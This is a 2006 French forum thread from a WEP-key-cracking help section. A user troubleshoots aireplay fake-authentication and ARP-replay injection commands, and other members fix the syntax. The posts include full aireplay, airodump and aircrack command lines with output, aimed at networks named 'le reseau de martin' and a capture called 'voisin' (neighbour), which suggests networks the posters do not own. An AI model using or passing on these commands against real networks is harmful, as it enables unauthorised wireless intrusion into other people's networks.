Problème avec aireplay (Page 1) / Crack de clef wep / Forum d'entraide: tuto-fr.com

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 21-05-2006 23:14:22

fly_in_the_sky
Membre
Inscription : 21-05-2006
Messages : 30

Problème avec aireplay

Bonjour ,
j'ai deux type de problème ,
lorsque j'ai voulut lancer aireplay il me donne ca comme message d'erreur


[email protected]:~# aireplay -1 0 -e theresowifi -a XX:XX:XX:XX:XX:XX -b XX:XX:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX ath0

18:47:51  Sending Authentication Request
18:47:53  Sending Authentication Request
18:47:55  Sending Authentication Request
18:47:57  Sending Authentication Request
18:47:59  Sending Authentication Request
18:48:01  Sending Authentication Request
18:48:03  Sending Authentication Request

Attack was unsuccessful. Possible reasons:

Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
      Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
      the transmit rate (iwconfig <iface> rate 1M).


Et le second problème c'est que le ESSID d'un autre reseau est en plusieur morceau (ex; "le wifi de martin") et lorsque je le marque comme ca dans aireplay

[email protected]:~# aireplay -1 0 -e le reseau de martin -a XX:XX:XX:XX:XX:XX -b XX:XX:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX ath0

et buien il n'y a rien qui se passe, juste la ligne que j'ai écris qui disparait, ...

J'ai éssayer de remplacer les espaces par des bar _ (le_reseau_de_martin) mais alors il me met le même message que plus haut

* Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
      Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
      the transmit rate (iwconfig <iface> rate 1M).


merci de m'aider
Nico

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 21-05-2006 23:21:29

charly5942
Membre d'honneur
Lieu : Lille
Inscription : 30-04-2007
Messages : 1 027

Re : Problème avec aireplay

Prob N°1: Quel est le power de la station? si il est faible, essaye de t'approcher. Sinon passe à l'étape suivante car l'authentification n'est pas nécessaire. Et si tu quand tu injecte tu recois un message disant que tu as une mauvaise adresse MAC réessaye l'etape d'authentification

Prob N°2: essaye comme ca déjà été dit dans le forum avec des guillemets " " autour du nom de l'ESSID


Matos: TP-Link TL-WN660G (chipset AR5005GS); Linksys WUSB54G V4; Atheros AR5005G
Dual boot XP / BT3 BETA
Tout message privé (MP) non sollicité sera immédiatement poubellisé sans être lu et par conséquent n'apportera aucune réponse !!! :-)

Hors Ligne

#3 22-05-2006 01:38:22

fly_in_the_sky
Membre
Inscription : 21-05-2006
Messages : 30

Re : Problème avec aireplay

Ok merci, ...
Est ce que le problème pourrait venir de ma carte Dlink G qui ne serais pas injecter des paquets ?

Hors Ligne

#4 22-05-2006 21:12:33

charly5942
Membre d'honneur
Lieu : Lille
Inscription : 30-04-2007
Messages : 1 027

Re : Problème avec aireplay

fly_in_the_sky a écrit :

Ok merci, ...
Est ce que le problème pourrait venir de ma carte Dlink G qui ne serais pas injecter des paquets ?

Quel est le modèle exact de ta clé?
Regarde sur la liste des cartes compatibles en vérifiant bien la version et choisit le bon CD live

Au fait les guillemets ca marche?


Matos: TP-Link TL-WN660G (chipset AR5005GS); Linksys WUSB54G V4; Atheros AR5005G
Dual boot XP / BT3 BETA
Tout message privé (MP) non sollicité sera immédiatement poubellisé sans être lu et par conséquent n'apportera aucune réponse !!! :-)

Hors Ligne

#5 22-05-2006 21:45:49

fly_in_the_sky
Membre
Inscription : 21-05-2006
Messages : 30

Re : Problème avec aireplay

Bon j'ai éssayer de passer directement à l'injection des paquets mais il me fais un nouveau message d'erreur :

[email protected]:~# aireplay -3 0 -e "wifi de la maison" -a 00:0F:B5:17:47:66 -b 00:0F:B5:17:47:66 -h 00:11:24:28:16:A8 -x 400 -r out-01.cap ath0
ioctl(SIOCGIFINDEX) failed: No such device
[email protected]:~# mnt/
-bash: mnt/: No such file or directory
[email protected]:~#
[email protected]:~# cd /mnt/hda6/
[email protected]:/mnt/hda6# aireplay -3 0 -e "le reseau de martin" -a XX:XX:XX:XX:XX:XX -b XX:XX:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX -x 400 -r out-01.cap ath0
ioctl(SIOCGIFINDEX) failed: No such device
[email protected]:/mnt/hda6# 

Vous en pensez quoi ?

Hors Ligne

#6 23-05-2006 16:17:11

fly_in_the_sky
Membre
Inscription : 21-05-2006
Messages : 30

Re : Problème avec aireplay

Up

Hors Ligne

#7 23-05-2006 16:42:12

Billyboylindien
Membre d'honneur
Inscription : 06-10-2005
Messages : 1 561
Site Web

Re : Problème avec aireplay

essai simplement sans le -r :

aireplay -3 0 -e "le reseau de martin" -a XX:XX:XX:XX:XX:XX -b XX:XX:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX -x 400 ath0

Ton fichier dans airodump, tu l'a appelé comment ??


Les cartes wifi recommandée et testées
Billyboylindien parle d'informatique (un peu wink ).

Proposez vous aussi vos tutos sur tout les sujets (web, prog, bricolage ...)

Hors Ligne

#8 23-05-2006 17:38:21

fly_in_the_sky
Membre
Inscription : 21-05-2006
Messages : 30

Re : Problème avec aireplay

J'ai tout simplement écris
[email protected]:/mnt/hda6# airodump ath0 out 11

1. Et quand je vais voir dans mon disqu hda6, il créee un fichier qui s'appell out-01.cap
du coup lorsque je lance aireplay j'ai écris out-01.cap et non juste "out" cela fais une différence ?

2. avec windows, la qualitéee du signal est entre 25 et 40 % c'est assez ?

3. Si j'enlève le -r je dois pas mettre "out" ? comment je ferai pour la suite du tuto ?

Hors Ligne

#9 23-05-2006 18:31:35

Billyboylindien
Membre d'honneur
Inscription : 06-10-2005
Messages : 1 561
Site Web

Re : Problème avec aireplay

Caé ne change rien pour la suite. Seulement que a la place de chercher des arp dans le fichier de capture de airodump, il va les chercher uniquement dans les ondes recu a partir du lancement de la commande.


Les cartes wifi recommandée et testées
Billyboylindien parle d'informatique (un peu wink ).

Proposez vous aussi vos tutos sur tout les sujets (web, prog, bricolage ...)

Hors Ligne

#10 07-06-2006 18:38:21

gf
Membre
Inscription : 07-06-2006
Messages : 4

Re : Problème avec aireplay

quand on ecris airodump ath0 out 0    le "out" est le non du fichier sur lequel il va s'enregistrer(en fat32), il faut donc lancer aireplay avec a la fin out.cap
si on tape airodump ath0 voisin 0   il faut lancer aireplay avec voisin.cap a la fin
moi ca marche mais a chaque fois que je lance airodump il faut mettre un nouveau nom de fichier car sinon ils seront invalide par la suite dans aircrack donc pas ivs
(aircrack -x -0 voisin.cap)

Hors Ligne

#11 08-06-2006 13:47:12

Wildchild
Membre
Inscription : 28-04-2006
Messages : 44

Re : Problème avec aireplay

fly_in_the_sky a écrit :

Bon j'ai éssayer de passer directement à l'injection des paquets mais il me fais un nouveau message d'erreur :

[email protected]:~# aireplay -3 0 -e "wifi de la maison" -a 00:0F:B5:17:47:66 -b 00:0F:B5:17:47:66 -h 00:11:24:28:16:A8 -x 400 -r out-01.cap ath0
ioctl(SIOCGIFINDEX) failed: No such device
[email protected]:~# mnt/
-bash: mnt/: No such file or directory
[email protected]:~#
[email protected]:~# cd /mnt/hda6/
[email protected]:/mnt/hda6# aireplay -3 0 -e "le reseau de martin" -a XX:XX:XX:XX:XX:XX -b XX:XX:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX -x 400 -r out-01.cap ath0
ioctl(SIOCGIFINDEX) failed: No such device
[email protected]:/mnt/hda6# 

Vous en pensez quoi ?

Mets toi dans le bon repertoire (celui ou tu as enregistrer ton fichier *.cap),et vire le 0 que j'ai mis en gras,j'avais le meme message d'erreur(ioctl(SIOCGIFINDEX) failed: No such device) et quand je l'ai enlevé ben ça a lancé la commande correctement. smile

Dernière modification par Wildchild (08-06-2006 13:55:17)

Hors Ligne

#12 08-06-2006 14:30:31

fly_in_the_sky
Membre
Inscription : 21-05-2006
Messages : 30

Re : Problème avec aireplay

Pk merci je vais éssayer ...

Hors Ligne

#13 08-06-2006 21:20:11

Wildchild
Membre
Inscription : 28-04-2006
Messages : 44

Re : Problème avec aireplay

-Ben dans le bon repertoire pour que le programme trouve le fichier

-Pour le 0 je sais pas,peut-etre parce-que on doit pas le rajouter avec le parametre 3 (injection)

Hors Ligne

#14 09-06-2006 20:00:44

fiddy60
Membre
Inscription : 27-05-2006
Messages : 4

Re : Problème avec aireplay

Bonjour,
J'ai un probleme lors de l'injection avec aireplay. Ma carte est une D-link G630 Rev C3. Sous backtrack, j ai installé avec succés le chipset MadWifi et je l'ai patché. Mais lorsque j'essaie de générer du trafic. Je recois un message d'erreur. (Me donnant plusieurs raisons dont "essayer de me rapprocher ou m'eloigner de l'AP" etc). Je pense etre a une bonne distance de l'AP. Je me demande donc si le patch recommandé sur le site peut bien faire de l'injection. Si quelqu'un a reussi, ou se trouve dans mon cas. N'hesitez pas.

Hors Ligne

#15 10-06-2006 01:50:32

wolfshad
Membre
Inscription : 31-05-2006
Messages : 16

Re : Problème avec aireplay

Peut-etre diminuer le taux de transfert à fesant iwconfig ath0 rate 1M

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
probleme avec backtrack 4 par perfectdin
1 2066 28-03-2017 20:05:05 par amr2017
0 599 11-11-2016 00:55:03 par SerialP
1 984 20-03-2016 21:26:05 par M1ck3y
0 1925 27-01-2013 15:30:58 par Farame
0 2684 03-02-2012 18:24:52 par Cherouss